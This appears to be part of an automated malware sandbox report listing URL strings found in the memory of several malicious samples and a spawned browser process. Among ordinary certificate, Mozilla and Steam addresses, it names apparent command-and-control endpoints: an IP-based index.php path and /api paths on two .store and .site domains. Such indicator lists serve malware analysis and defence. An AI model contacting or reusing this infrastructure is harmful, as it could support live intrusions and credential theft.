Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php_~f
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 0000000A.00000002.3448009967.000000000120F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpft
Source: skotes.exe, 0000000A.00000002.3448009967.000000000120F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phphell32.dll
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpn
Source: skotes.exe, 0000000A.00000002.3448009967.000000000120F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpz
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/erences.SourceAumid001w
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/l
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/m
Source: file.exe, 00000000.00000003.2248812856.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2925089274.000000000583E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2248812856.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2925089274.000000000583E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: file.exe, 00000000.00000003.2248812856.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2925089274.000000000583E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2248812856.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2925089274.000000000583E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2248812856.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2925089274.000000000583E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2248812856.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2925089274.000000000583E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2248812856.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2925089274.000000000583E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001C.00000002.3249551937.0000026830339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlACTIVITY_SUBTYPE_PROXY_RESPONSE_HEADERdetach
Source: firefox.exe, 0000001C.00000002.3209641158.0000026829BF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3271841943.0000026831F88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001C.00000002.3209641158.0000026829BF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3271841943.0000026831F88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001C.00000002.3208584515.0000026829A8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001C.00000002.3208584515.0000026829A8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001C.00000002.3208584515.0000026829A8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001C.00000002.3201171185.000002681E103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: http://fb.me/use-check-prop-types
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: http://fb.me/use-check-prop-typesG
Source: firefox.exe, 0000001C.00000002.3256077299.0000026830620000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3265464725.00000268318BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3233875110.000002682E6DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3256077299.0000026830626000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3113229583.000002682DBDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3224173034.000002682DBD3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3113229583.000002682DBD0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3272907510.0000026832041000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3234891682.000002682E8AC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3249551937.000002683031E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3249551937.00000268303C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3249551937.0000026830303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3234551838.000002682E76E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3270272043.0000026831EAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B62E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3272907510.000002683209D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3234891682.000002682E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3256077299.0000026830603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3222889062.000002682D9B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3286894559.0000026B0003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3271841943.0000026831F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.2248812856.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2925089274.000000000583E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2248812856.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2925089274.000000000583E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: http://stackoverflow.com/questions/30030031)
Source: file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222112798.00000000006A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.s
Source: file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222112798.00000000006A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/acc
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.000000000068E000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034649856.000000000114A000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3035132023.000000000114F000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.000000000068E000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034649856.000000000114A000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3035132023.000000000114F000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.000000000068E000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034649856.000000000114A000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3035132023.000000000114F000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updateisAppBaseDirWritable
Source: firefox.exe, 0000001C.00000002.3225731189.000002682DF47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulPanelUI._onNotificationButtonEvent(even
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A8AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xultoolbar-context-menu-bookmarks-toolbar-
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000003.2248812856.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2925089274.000000000583E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2248812856.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2925089274.000000000583E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001C.00000003.3086576569.000002682E253000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3222736254.000002682D870000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000003.3083238118.000002682E000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3085509496.000002682E210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.2222905597.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2223063752.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222836182.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2899443498.0000000005841000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898618121.0000000005844000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898704661.0000000005841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001C.00000002.3249551937.00000268303A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.caextensions.experiments.enabledfirefox-compact-dark
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001C.00000002.3272907510.00000268320E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3262618726.0000026830886000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3197005739.000000FA7CBD8000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001C.00000002.3199975581.000002681DE79000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
Source: firefox.exe, 0000001C.00000002.3201171185.000002681E1D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.orgbookmarksToolbarWasVisiblebrowser.tabs.drawInTitlebarcreateContentPrincipa
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F80B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3290440543.00003793D3B04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: ee8d47a049.exe, 0000000C.00000003.2883437222.000000000107A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.s
Source: file.exe, 00000000.00000003.2208378374.0000000000619000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199555514.0000000000618000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.sTsa
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.000000000068E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8d
Source: ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: firefox.exe, 0000001C.00000002.3290440543.00003793D3B04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://baidu.com
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://basket.mozilla.org/news/subscribe/
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://basket.mozilla.org/news/subscribe_sms/
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://basket.mozilla.org/subscribe.json
Source: ee8d47a049.exe, 0000000E.00000003.3035132023.0000000001155000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001155000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bathdoomgaz.store:443/api
Source: file.exe, 00000000.00000003.2249981893.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2926652624.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B62E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2249981893.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2926652624.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B62E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: firefox.exe, 0000001C.00000002.3244804449.000002682FA1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3247192671.000002682FE03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A8AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A8AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Required
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.2222905597.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2223063752.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222836182.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2899443498.0000000005841000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898618121.0000000005844000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898704661.0000000005841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2222905597.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2223063752.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222836182.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2899443498.0000000005841000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898618121.0000000005844000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898704661.0000000005841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2222905597.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2223063752.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222836182.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2899443498.0000000005841000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898618121.0000000005844000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898704661.0000000005841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: ee8d47a049.exe, 0000000C.00000003.2884028726.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3035132023.0000000001155000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001155000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clearancek.site:443/api
Source: ee8d47a049.exe, 0000000E.00000003.3035132023.0000000001155000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001155000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clearancek.site:443/apii
Source: file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cl-
Source: file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamsta
Source: ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993784315.0000000001102000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2967613756.00000000010B9000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958718238.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstat
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.000000000068E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199555514.0000000000618000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.000000000107A000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034649856.000000000114A000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000002.3052863545.000000000114A000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX
